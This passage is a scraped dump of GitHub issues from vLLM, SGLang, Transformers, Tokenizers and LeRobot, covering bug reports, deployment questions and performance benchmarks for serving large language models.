"https://github.com/vllm-project/vllm/issues/31467", "state": "open", "labels": [ "RFC" ], "created_at": "2025-12-29T02:44:13Z", "updated_at": "2026-01-06T07:38:29Z", "comments": 12, "user": "MengqingCao" }, { "repo": "vllm-project/vllm", "number": 31437, "title": "[Bug]: Streaming tool calls missing id/type/name in finish chunk", "body": "### Your current environment\n\nvLLM 0.14.0rc1.dev3 (but also affects main branch as of today)\n\n### Model\n\nGLM-4.7-AWQ with `--tool-call-parser glm47` (also affects other parsers that emit complete tool calls)\n\n### What is the issue?\n\nWhen streaming tool calls, the finish chunk code in `serving_chat.py` overwrites the tool parser's properly-formatted `DeltaMessage` with a stripped-down version that only contains `index` and `function.arguments`, losing the `id`, `type`, and `function.name` fields.\n\nThis breaks OpenAI-compatible clients that expect `id` to be present in tool call responses.\n\n### Root cause\n\nIn `serving_chat.py` around line 1237, when `_should_check_for_unstreamed_tool_arg_tokens()` returns true:\n\n```python\nremaining_call = expected_call.replace(actual_call, \"\", 1)\ndelta_message = DeltaMessage(\n tool_calls=[\n DeltaToolCall(\n index=index,\n function=DeltaFunctionCall(\n arguments=remaining_call\n ).model_dump(exclude_none=True),\n )\n ]\n)\n```\n\nThis creates a new `DeltaMessage` without preserving `id`, `type`, or `function.name` from the original `delta_message` that the tool parser returned.\n\n### Proposed fix\n\nPreserve the fields from the original delta:\n\n```python\nremaining_call = expected_call.replace(actual_call, \"\", 1)\noriginal_tc = delta_message.tool_calls[0]\noriginal_fn = original_tc.function if original_tc else None\ndelta_message = DeltaMessage(\n tool_calls=[\n DeltaToolCall(\n index=index,\n id=original_tc.id if original_tc else None,\n type=original_tc.type if original_tc else None,\n function=DeltaFunctionCall(\n name=original_fn.name if original_fn else None,\n arguments=remaining_call,\n ),\n )\n ]\n)\n```\n\n### Why this wasn't caught before\n\nThis code path only triggers when the tool parser hasn't streamed all argument tokens yet. Many parsers stream arguments incrementally, so they rarely hit this path. Parsers like GLM that emit complete tool calls at once trigger it consistently.\n\n### Related issues\n\n- #16340 (similar symptoms, different root cause)\n- #10781 (mentions delta not being submitted correctly)\n\nHappy to submit a PR if this approach looks right.\n\n### Before submitting a new issue...\n\n- [X] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31437", "state": "closed", "labels": [], "created_at": "2025-12-27T23:54:20Z", "updated_at": "2025-12-29T13:10:54Z", "comments": 0, "user": "amittell" }, { "repo": "vllm-project/vllm", "number": 31414, "title": "[Feature][Cleanup]: Unify `vllm.utils.flashinfer` and `vllm.model_executor.layers.quantization.utils.flashinfer_utils`", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nits confusing to have both\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31414", "state": "open", "labels": [ "help wanted", "good first issue", "feature request" ], "created_at": "2025-12-27T18:27:00Z", "updated_at": "2025-12-31T22:25:36Z", "comments": 4, "user": "robertgshaw2-redhat" }, { "repo": "vllm-project/vllm", "number": 31398, "title": "[Doc]: Eagle3 with tensor parallelism", "body": "### \ud83d\udcda The doc issue\n\nAccording to https://docs.vllm.ai/en/latest/features/spec_decode/#speculating-using-eagle-based-draft-models: \n\n> The EAGLE based draft models need to be run without tensor parallelism (i.e. draft_tensor_parallel_size is set to 1 in speculative_config), although it is possible to run the main model using tensor parallelism (see example above).\n\nBut there's no explanation for why the draft tpsize could only be set to 1, so I checked the code and found:\n\nhttps://github.com/vllm-project/vllm/blob/52bf0665168c539d2d061a664ad62b18a12e80bb/vllm/config/speculative.py#L441-L447\n\nand\n\nhttps://github.com/vllm-project/vllm/blob/52bf0665168c539d2d061a664ad62b18a12e80bb/vllm/config/speculative.py#L563-L571\n\nI did not find any explicit restriction that enforces the draft model to run without tensor parallelism.\n\nSo I guess the `draft_tensor_parallel_size` should be set to **either** 1 **or** the same value as the target_model. And also I tried doing so, and found that the tensor parallelism seems worked correctly.\n\nIs it possible that this functionality has already been implemented, but the documentation has not been updated accordingly?\n\n\n### Suggest a potential alternative/fix\n\nJust change one line of documentation as mentioned above:\n\n> It's possible to run the EAGLE based draft models with tensor_parallel using tp_size=1 or target_model_tpsize (i.e. `draft_tensor_parallel_size` is set to either 1 or the same value as the target_model in speculative_config).\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31398", "state": "open", "labels": [ "documentation" ], "created_at": "2025-12-27T03:10:50Z", "updated_at": "2026-01-04T01:21:07Z", "comments": 3, "user": "JSYRD" }, { "repo": "huggingface/transformers", "number": 43048, "title": "Need to understand difference between TP support via transformers code v/s Pytorch's native parallelize_module API.", "body": "Based on the existing code base of transformers, below sequence of operations are performed on model object to make it TP compatible.\n\n- TP Plan for Llama: https://github.com/huggingface/transformers/blob/a7f29523361b2cc12e51c1f5133d95f122f6f45c/src/transformers/models/llama/configuration_llama.py#L113\n- self._tp_plan populated based on above default plan:\nhttps://github.com/huggingface/transformers/blob/a7f29523361b2cc12e51c1f5133d95f122f6f45c/src/transformers/modeling_utils.py#L1325\n- from_pretrained calls distribute_model\nhttps://github.com/huggingface/transformers/blob/a7f29523361b2cc12e51c1f5133d95f122f6f45c/src/transformers/modeling_utils.py#L3944\n- distribute_model internally applies TP hooks based on the plans defined for each module.\nhttps://github.com/huggingface/transformers/blob/a7f29523361b2cc12e51c1f5133d95f122f6f45c/src/transformers/integrations/tensor_parallel.py#L1307 \n\n\nI want to understand how this is different than parallelize_module API of Pytorch (https://docs.pytorch.org/docs/stable/distributed.tensor.parallel.html#torch.distributed.tensor.parallel.parallelize_module).\n\nOne example of TP+DP can be referred from below link.\nhttps://github.com/pytorch/pytorch/blob/7de041cb5a5817500b973eb32a70325187a83407/test/distributed/_composable/test_composability/test_2d_composability.py#L478\n\nFrom the Pytorch example, it looks very clean to work with plain DP and TP. But when using Transformer's Trainer along with Accelerate for Plain DP+TP then there are lot of complications identified in https://github.com/huggingface/accelerate/issues/3876#issuecomment-3627324602.\n\nI would like to understand the difference between the existing transformers approach and plain Pytorch approach and request streamlining the implementation of transformers as well as accelerate if that feels suitable.", "url": "https://github.com/huggingface/transformers/issues/43048", "state": "open", "labels": [], "created_at": "2025-12-26T10:05:38Z", "updated_at": "2026-01-05T15:35:13Z", "comments": 1, "user": "quic-meetkuma" }, { "repo": "huggingface/lerobot", "number": 2721, "title": "The virtual machine is unable to recognize the keyboard.", "body": "### Ticket Type\n\n\u2753 Technical Question\n\n### Environment & System Info\n\n```Shell\n(base) tom@tom-VMware-Virtual-Platform:~/lerobot_alohamini$ python check_lerobot.py \n\u4f7f\u7528\u73b0\u6709\u7684DISPLAY: :0\n=== \u73af\u5883\u8bca\u65ad ===\nPython \u7248\u672c: 3.12.12 | packaged by conda-forge | (main, Oct 22 2025, 23:25:55) [GCC 14.3.0]\nDISPLAY \u73af\u5883\u53d8\u91cf: :0\nXDG_SESSION_TYPE \u73af\u5883\u53d8\u91cf: wayland\nWayland_DISPLAY \u73af\u5883\u53d8\u91cf: \u672a\u8bbe\u7f6e\n===============\n\n\u6b63\u5728\u542f\u52a8\u952e\u76d8\u76d1\u542c\u5668...\n\u8bf7\u5c1d\u8bd5\u6309\u4e0b\u4e00\u4e9b\u5b57\u6bcd\u952e\u548c\u65b9\u5411\u952e\u3002\n\u6309 `ESC` \u952e\u9000\u51fa\u6d4b\u8bd5\u3002\n\n\u76d1\u542c\u5668\u7ebf\u7a0b\u5df2\u542f\u52a8\u3002\u7b49\u5f85\u6309\u952e\u8f93\u5165...\nwsdasdwsdasdfdaswdsdfawdsa\n```\n\n### Description\n\nWhen you use the Ubuntu system of the virtual machine to control the main arm and chassis, you may encounter a problem where the keyboard cannot be recognized. This problem is actually quite easy to solve. All you need to do is log out of your desktop, go to the login screen, and click the \u2699 gear icon below the username to select \"Ubuntu on Xorg\". The reason for this problem is that the pynput library relies on the X11 protocol, while Wayland is a new display server protocol, and the two are not fully compatible.After that, you can safely use your keyboard.\n\n### Context & Reproduction\n\n_No response_\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [ ] I have searched existing tickets to ensure this isn't a duplicate.\n- [ ] I am using the latest version of the `main` branch.\n- [ ] I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\n_No response_", "url": "https://github.com/huggingface/lerobot/issues/2721", "state": "open", "labels": [ "question" ], "created_at": "2025-12-26T08:02:27Z", "updated_at": "2025-12-26T08:02:37Z", "user": "ht202" }, { "repo": "huggingface/transformers", "number": 43045, "title": "Multimodal chat sample", "body": "### Feature request\n\nAdd a sample covering chat scenario including images, videos or audio.\n\n### Motivation\n\n`AutoModelForCausalLM`'s `use_cache` is barely documented.\nDescribe a pattern handling the following cases\n1. Tokenizer replaces tokens that are already in kv cache with a different token. For example, the model generated 2 tokens with string representations: `a` and `b` and the tokenizer replaces them with a single `a b` token on the next iteration invalidating a part of kv cache\n2. Reuse embeddings computed earlier for non text modalities\n\nThere's https://github.com/huggingface/transformers/blob/a7f29523361b2cc12e51c1f5133d95f122f6f45c/src/transformers/cli/chat.py but it doesn't cover non text modalities.\n\n### Your contribution\n\nI'm fine to submit a PR. That will help me to learn along the way. But I need guidance how to resolve the issues I described in the motivation section.", "url": "https://github.com/huggingface/transformers/issues/43045", "state": "closed", "labels": [ "Feature request" ], "created_at": "2025-12-26T06:16:53Z", "updated_at": "2025-12-31T10:36:38Z", "comments": 9, "user": "Wovchena" }, { "repo": "sgl-project/sglang", "number": 15860, "title": "[Ask for help] How to deploy GLM-4.7", "body": "Hi, can anyone help me to deploy GLM-4.7? I encounter a bug when using `sglang==0.5.6.post2` (which is latest on `https://github.com/sgl-project/sglang`). What is the correct version for GLM-4.7?\n```\nlaunch_server.py: error: argument --tool-call-parser: invalid choice: 'glm47' (choose from 'deepseekv3', 'deepseekv31', 'deepseekv32', 'glm', 'glm45', 'gpt-oss', 'kimi_k2', 'llama3', 'mistral', 'pythonic', 'qwen', 'qwen25', 'qwen3_coder', 'step3', 'minimax-m2')\n```\n\nThanks so much!!!!!!!!!!!\n\n\"Image\"", "url": "https://github.com/sgl-project/sglang/issues/15860", "state": "open", "labels": [], "created_at": "2025-12-26T02:59:06Z", "updated_at": "2025-12-28T21:21:17Z", "comments": 2, "user": "sunjie279" }, { "repo": "huggingface/tokenizers", "number": 1919, "title": "De/tokenization on CUDA", "body": "Could at least de-tokenization be done directly on CUDA? Like in my hack `bpedecode_vec` in https://github.com/pytorch/pytorch/issues/135704#issue-2520180382 which indexes into a detokenization vocab byte table via `repeat_interleave`\n\nAlso, maybe for better CUDAGraph-ability / no CPU syncs, there should be some static-sized pre-allocated `out=` version, like `torch.nonzero_static`?\n\n---\nOfftopic: it's also a bit inconsistent naming to have `batch_decode` and `batch_encode_plus`... What is the motivation for the `_plus` suffix?", "url": "https://github.com/huggingface/tokenizers/issues/1919", "state": "open", "labels": [], "created_at": "2025-12-26T02:20:49Z", "updated_at": "2026-01-05T10:51:17Z", "comments": 1, "user": "vadimkantorov" }, { "repo": "vllm-project/vllm", "number": 31361, "title": "[Usage]: Question about the dummy run\u3002It seems the dummy run use different precision?", "body": "### Question\n\nI am trying to modify vllm. especially the **tp** communication, i'am tring to **break all-reduce into reduce-scatter + all-gather**. \n\nHowever I encountered precision problem, after i print the hidden states. it seems each layer has around +-0.01 diff, when it accumulated over all the layers, the result seems to be a huge difference. I thought it may be my implementation error. But after I checked the log, I see some dummy run before executing real request. **I checked the dummy run's data. It perfectly matches between all-reduce & reduce-scatter + all-gather**, which means each layer is exactly same with no accumulated error. So I wonder \n1. Can you tell me where there is two dummy run. in My example of Qwen3-32B, one seqlen is max model len, one seqlen is 1024\n2. Can you possibly tell me What may influence the precision ?\n\n\n### How would you like to use vllm\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31361", "state": "closed", "labels": [ "usage" ], "created_at": "2025-12-25T16:38:03Z", "updated_at": "2025-12-27T03:41:27Z", "comments": 0, "user": "Dingjifeng" }, { "repo": "vllm-project/vllm", "number": 31353, "title": "[Bug]: KV Cache grows continuously with just one chat completion request using meta-llama/Llama-3.2-1B on L40 GPU with Flash Attention and finally completed after 10 minutes", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.3 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : version 3.28.3\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.11 | packaged by Anaconda, Inc. | (main, Jun 5 2025, 13:09:17) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-5.15.0-161-generic-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.6.85\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : GPU 0: NVIDIA L40S\nNvidia driver version : 550.163.01\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.5.1\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.5.1\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.5.1\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.5.1\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.5.1\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.5.1\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.5.1\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.5.1\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 46 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 16\nOn-line CPU(s) list: 0-15\nVendor ID: GenuineIntel\nModel name: Intel(R) Xeon(R) Gold 6338 CPU @ 2.00GHz\nCPU family: 6\nModel: 106\nThread(s) per core: 2\nCore(s) per socket: 8\nSocket(s): 1\nStepping: 6\nBogoMIPS: 3990.65\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid tsc_known_freq pni pclmulqdq dtes64 ssse3 fma cx16 pdcm pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm abm 3dnowprefetch cpuid_fault invpcid_single ssbd ibrs ibpb stibp ibrs_enhanced fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves wbnoinvd arat avx512vbmi umip pku ospke avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq la57 rdpid fsrm md_clear arch_capabilities\nHypervisor vendor: KVM\nVirtualization type: full\nL1d cache: 512 KiB (16 instances)\nL1i cache: 512 KiB (16 instances)\nL2 cache: 32 MiB (8 instances)\nL3 cache: 16 MiB (1 instance)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-15\nVulnerability Gather data sampling: Unknown: Dependent on hypervisor status\nVulnerability Indirect target selection: Mitigation; Aligned branch/return thunks\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Vulnerable: Clear CPU buffers attempted, no microcode; SMT Host state unknown\nVulnerability Reg file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic IBRS; IBPB conditional;", "url": "https://github.com/vllm-project/vllm/issues/31353", "state": "open", "labels": [ "bug", "help wanted" ], "created_at": "2025-12-25T13:56:52Z", "updated_at": "2025-12-27T15:55:34Z", "comments": 1, "user": "aravilli" }, { "repo": "sgl-project/sglang", "number": 15825, "title": "Is it normal that Qwen3-30B-A3B runs slower than Qwen3-8B?", "body": "I serve two models on the Ascend 910 platform (following sglang's ascend examples) with the same tp2dp8 and benchmarked them. \nBefore testing, I suppose A3B will be faster than 8B for fewer activated tensor blocks. \nBut the result is different:\n### qwen 30B A3B\n```\nexport SGLANG_SET_CPU_AFFINITY=1\nexport PYTORCH_NPU_ALLOC_CONF=expandable_segments:True\nexport STREAMS_PER_DEVICE=32\nexport HCCL_BUFFSIZE=1536\nexport HCCL_OP_EXPANSION_MODE=AIV\nexport SGLANG_DEEPEP_NUM_MAX_DISPATCH_TOKENS_PER_RANK=32\nexport SGLANG_DEEPEP_BF16_DISPATCH=1\nexport ENABLE_ASCEND_MOE_NZ=1\n\npython -m sglang.launch_server \\\n --device npu \\\n --attention-backend ascend \\\n --trust-remote-code \\\n --tp-size 2 \\\n --dp-size 8 \\\n --model **Qwen/Qwen3-30B-A3B-Instruct-2507** \\\n --model-path /models/Qwen3-30B-A3B-Instruct-2507 \\\n --port 30111 \\\n --mem-fraction-static 0.8\n```\n```\n============ Serving Benchmark Result ============\nBackend: sglang \nTraffic request rate: inf \nMax request concurrency: not set \nSuccessful requests: 1000 \nBenchmark duration (s): 69.68 \nTotal input tokens: 3055233 \nTotal input text tokens: 3055233 \nTotal input vision tokens: 0 \nTotal generated tokens: 513413 \nTotal generated tokens (retokenized): 512578 \nRequest throughput (req/s): 14.35 \nInput token throughput (tok/s): 43846.56 \n**Output token throughput (tok/s): 7368.14** \nPeak output token throughput (tok/s): 12775.00 \nPeak concurrent requests: 1000 \nTotal token throughput (tok/s): 51214.70 \nConcurrency: 665.97 \n----------------End-to-End Latency----------------\nMean E2E Latency (ms): 46404.83 \nMedian E2E Latency (ms): 49605.93 \n---------------Time to First Token----------------\nMean TTFT (ms): 10682.85 \nMedian TTFT (ms): 9808.31 \nP99 TTFT (ms): 16320.45 \n-----Time per Output Token (excl. 1st token)------\nMean TPOT (ms): 96.14 \nMedian TPOT (ms): 75.08 \nP99 TPOT (ms): 399.24 \n---------------Inter-Token Latency----------------\nMean ITL (ms): 69.71 \nMedian ITL (ms): 69.43 \nP95 ITL (ms): 80.73 \nP99 ITL (ms): 96.53 \nMax ITL (ms): 5450.67 \n==================================================\n```\n\n### Qwen3 8B\n\n```\nexport SGLANG_SET_CPU_AFFINITY=1\nexport PYTORCH_NPU_ALLOC_CONF=expandable_segments:True\nexport STREAMS_PER_DEVICE=32\nexport HCCL_BUFFSIZE=1536\nexport HCCL_OP_EXPANSION_MODE=AIV\n\nASCEND_RT_VISIBLE_DEVICES=0 python -m sglang.launch_server \\\n --device npu \\\n --attention-backend ascend \\\n --trust-remote-code \\\n --model Qwen/Qwen3-8B \\\n --model-path /models/Qwen3-8B \\\n --port 30111 \\\n --mem-fraction-static 0.8 \\\n --tp-size 2 \\\n --dp-size 8 \n```\n```\n============ Serving Benchmark Result ============\nBackend: sglang \nTraffic request rate: inf \nMax request concurrency: not set \nSuccessful requests: 1000 \nBenchmark duration (s): 49.67 \nTotal input tokens: 3055233 \nTotal input text tokens: 3055233 \nTotal input vision tokens: 0 \nTotal generated tokens: 513413 \nTotal generated tokens (retokenized): 512976 \nRequest throughput (req/s): 20.13 \nInput token throughput (tok/s): 61513.14 \n**Output token throughput (tok/s): 10336.90** \nPeak output token throughput (tok/s): 23242.00 \nPeak concurrent requests: 1000 \nTotal token throughput (tok/s): 71850.04 \nConcurrency: 709.69 \n----------------End-to-End Latency----------------\nMean E2E Latency (ms): 35249.04 \nMedian E2E Latency (ms): 36490.95 \n---------------Time to First Token----------------\nMean TTFT (ms): 10977.22 \nMedian TTFT (ms): 9339.57 \nP99 TTFT (ms): 16697.36 \n-----Time per Output Token (excl. 1st token)------\nMean TPOT (ms): 82.35 \nMedian TPOT (ms): 48.71 \nP99 TPOT (ms): 516.74 \n---------------Inter-Token Latency----------------\nMean ITL (ms): 47.37 \nMedian ITL (ms): 35.12 \nP95 ITL (ms): 105.74 \nP99 ITL (ms): 463.46 \nMax I", "url": "https://github.com/sgl-project/sglang/issues/15825", "state": "open", "labels": [], "created_at": "2025-12-25T11:26:10Z", "updated_at": "2025-12-25T11:26:10Z", "comments": 0, "user": "yucc-leon" }, { "repo": "vllm-project/vllm", "number": 31344, "title": "[Usage]: how to pass param logits_processors in AsyncEngineArgs?", "body": "### Your current environment\n import torch\nfrom transformers import LogitsProcessor\nfrom transformers.generation.logits_process import _calc_banned_ngram_tokens\nfrom typing import List, Set\n\n\nclass NoRepeatNGramLogitsProcessor(LogitsProcessor):\n\n def __init__(self, ngram_size: int, window_size: int = 100, whitelist_token_ids: set = None):\n if not isinstance(ngram_size, int) or ngram_size <= 0:\n raise ValueError(f\"`ngram_size` has to be a strictly positive integer, but is {ngram_size}\")\n if not isinstance(window_size, int) or window_size <= 0:\n raise ValueError(f\"`window_size` has to be a strictly positive integer, but is {window_size}\")\n self.ngram_size = ngram_size\n self.window_size = window_size\n self.whitelist_token_ids = whitelist_token_ids or set()\n \n def __call__(self, input_ids: List[int], scores: torch.FloatTensor) -> torch.FloatTensor:\n if len(input_ids) < self.ngram_size:\n return scores\n \n current_prefix = tuple(input_ids[-(self.ngram_size - 1):])\n \n search_start = max(0, len(input_ids) - self.window_size)\n search_end = len(input_ids) - self.ngram_size + 1\n \n banned_tokens = set()\n for i in range(search_start, search_end):\n ngram = tuple(input_ids[i:i + self.ngram_size])\n if ngram[:-1] == current_prefix:\n banned_tokens.add(ngram[-1])\n \n banned_tokens = banned_tokens - self.whitelist_token_ids\n \n if banned_tokens:\n scores = scores.clone()\n for token in banned_tokens:\n scores[token] = -float(\"inf\")\n \n return scores\n\n\n\n async def stream_generate(image=None, prompt=''):\n logits_processors = [NoRepeatNGramLogitsProcessor(ngram_size=30, window_size=90,\n whitelist_token_ids={128821, 128822})] # whitelist: , \n #\u9ad8\u7248\u672c\n logits_processors_config: list[Dict[str, Any]] = [\n {\n \"class\": NoRepeatNGramLogitsProcessor, # \u4f20\u5165\u7c7b\u5bf9\u8c61\n \"kwargs\": { # \u521d\u59cb\u5316\u53c2\u6570\n \"ngram_size\": 30,\n \"window_size\": 90,\n \"whitelist_token_ids\": {128821, 128822}\n }\n }\n ]\n \n engine_args = AsyncEngineArgs(\n model=MODEL_PATH,\n #hf_overrides={\"architectures\": [\"DeepseekOCRForCausalLM\"]},\n block_size=256,\n max_model_len=8192,\n enforce_eager=False,\n trust_remote_code=True, \n tensor_parallel_size=1,\n gpu_memory_utilization=0.75,\n logits_processors=logits_processors_config\n )\n engine = AsyncLLMEngine.from_engine_args(engine_args)\n \n\nerror:\n\".local/lib/python3.13/site-packages/vllm/engine/arg_utils.py\", line 1189, in create_model_config\n return ModelConfig(\n model=self.model,\n ...<46 lines>...\n io_processor_plugin=self.io_processor_plugin,\n )\n File \"/.local/lib/python3.13/site-packages/pydantic/_internal/_dataclasses.py\", line 121, in __init__\n s.__pydantic_validator__.validate_python(ArgsKwargs(args, kwargs), self_instance=s)\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\npydantic_core._pydantic_core.ValidationError: 2 validation errors for ModelConfig\nlogits_processors.0.str\n Input should be a valid string [type=string_type, input_value={'class': tag ", "body": "### Your current environment\n\nI am on docker nightly vLLM API server version 0.14.0rc1.dev104+g8ee90c83f\n\n\n### \ud83d\udc1b Describe the bug\n\n\nI hosted the model via vllm and already without reasoning_parser, I found the model output with directly output without but having close tag later. \n\n```\nroot@iv-ydzbs5zshss6ipm6s5gu /h/n/d/ark_http_proxy# curl --location 'http://localhost/v1/chat/completions' \\\n --header 'Authorization: Bearer YOUR_API_KEY' \\\n --header 'Content-Type: application/json' \\\n --data '{\n \"model\": \"GLM-4.7-FP8\", \"stream\": true,\n \"messages\": [\n {\n \"role\": \"user\",\n \"content\": \"what is cryptography\"\n }\n ],\"chat_template_kwargs\": {\"enable_thinking\": true}, \"skip_special_tokens\": false,\n \"thinking\": {\n \"type\": \"enabled\"\n },\n \"max_tokens\": 1024,\n \"temperature\": 1.0\n }'\ndata: {\"id\":\"chatcmpl-9fbc092d919f9e51\",\"object\":\"chat.completion.chunk\",\"created\":1766599479,\"model\":\"GLM-4.7-FP8\",\"choices\":[{\"index\":0,\"delta\":{\"role\":\"assistant\",\"content\":\"\",\"reasoning_content\":null},\"logprobs\":null,\"finish_reason\":null}],\"prompt_token_ids\":null}\n\ndata: {\"id\":\"chatcmpl-9fbc092d919f9e51\",\"object\":\"chat.completion.chunk\",\"created\":1766599479,\"model\":\"GLM-4.7-FP8\",\"choices\":[{\"index\":0,\"delta\":{\"content\":\"1\",\"reasoning_content\":null},\"logprobs\":null,\"finish_reason\":null,\"token_ids\":null}]}\n\ndata: {\"id\":\"chatcmpl-9fbc092d919f9e51\",\"object\":\"chat.completion.chunk\",\"created\":1766599479,\"model\":\"GLM-4.7-FP8\",\"choices\":[{\"index\":0,\"delta\":{\"content\":\". \",\"reasoning_content\":null},\"logprobs\":null,\"finish_reason\":null,\"token_ids\":null}]}\n\ndata: {\"id\":\"chatcmpl-9fbc092d919f9e51\",\"object\":\"chat.completion.chunk\",\"created\":1766599479,\"model\":\"GLM-4.7-FP8\",\"choices\":[{\"index\":0,\"delta\":{\"content\":\" **An\",\"reasoning_content\":null},\"logprobs\":null,\"finish_reason\":null,\"token_ids\":null}]}\n\ndata: {\"id\":\"chatcmpl-9fbc092d919f9e51\",\"object\":\"chat.completion.chunk\",\"created\":1766599479,\"model\":\"GLM-4.7-FP8\",\"choices\":[{\"index\":0,\"delta\":{\"content\":\"alyze the\",\"reasoning_content\":null},\"logprobs\":null,\"finish_reason\":null,\"token_ids\":null}]}\n```\nI confirmed that chat template will \n\n```\nroot@iv-ydzbs5zshss6ipm6s5gu /h/n/d/ark_http_proxy# curl -sS 'http://127.0.0.1/tokenize' \\\n -H 'Content-Type: application/json' \\\n -d '{\"model\":\"GLM-4.7-FP8\",\"messages\":[{\"role\":\"user\",\"content\":\"hi\"}],\"add_generation_prompt\":true,\"return_token_strs\":true}'\n{\"count\":6,\"max_model_len\":202752,\"tokens\":[151331,151333,151336,6023,151337,151350],\"token_strs\":[\"[gMASK]\",\"\",\"<|user|>\",\"hi\",\"<|assistant|>\",\"\"]}\u23ce \n```\n\n\nI think we need a similar **minimax_m2_append_think** reasoning parser to simply append think to content beginning?\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31319", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-24T18:45:34Z", "updated_at": "2026-01-06T07:59:45Z", "comments": 16, "user": "Nemo-G" }, { "repo": "vllm-project/vllm", "number": 31278, "title": "[Usage]:\u8bf7\u95eeQwen3-VL\u672c\u5730\u52a0\u8f7d\u6a21\u5f0f\u652f\u6301\u5355\u72ec\u52a0\u8f7dLoRA\u4e48\uff1f", "body": "\u8bf7\u95eeQwen3-VL\u672c\u5730\u52a0\u8f7d\u6a21\u5f0f\u652f\u6301\u5355\u72ec\u52a0\u8f7dLoRA\u4e48\uff1f", "url": "https://github.com/vllm-project/vllm/issues/31278", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-24T11:33:08Z", "updated_at": "2025-12-25T03:52:16Z", "comments": 3, "user": "dengdeng-cat" }, { "repo": "vllm-project/vllm", "number": 31272, "title": "[Performance]: b200x8 deepseek-ai/DeepSeek-V3.2-Exp max perf", "body": "### Proposal to improve performance\n\n_No response_\n\n### Report of performance regression\n\nDo you have any ideas on how to increase TPS? I have two servers \u2014 one with H200 \u00d78 and another with B200 \u00d78. They use the same startup script, but the performance is almost identical. In my opinion, B200 should be faster than H200, so maybe my settings are not optimal\nvllm serve \\\n --model deepseek-ai/DeepSeek-V3.2-Exp \\\n --served-model-name deepseek-ai/DeepSeek-V3.2-Exp \\\n --host 0.0.0.0 \\\n --port 12345 \\\n --tensor-parallel-size 8 \\\n --enable-auto-tool-choice \\\n --tool-call-parser deepseek_v31 \\\n --chat-template /root/tool_chat_template_deepseekv31.jinja \\\n --gpu-memory-utilization 0.9 \\\n --max-model-len 125000 \\\n\n### Misc discussion on performance\n\n_No response_\n\n### Your current environment (if you think it is necessary)\n\n```text\nCollecting environment information...\nuv is set\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.3 LTS (x86_64)\nGCC version : 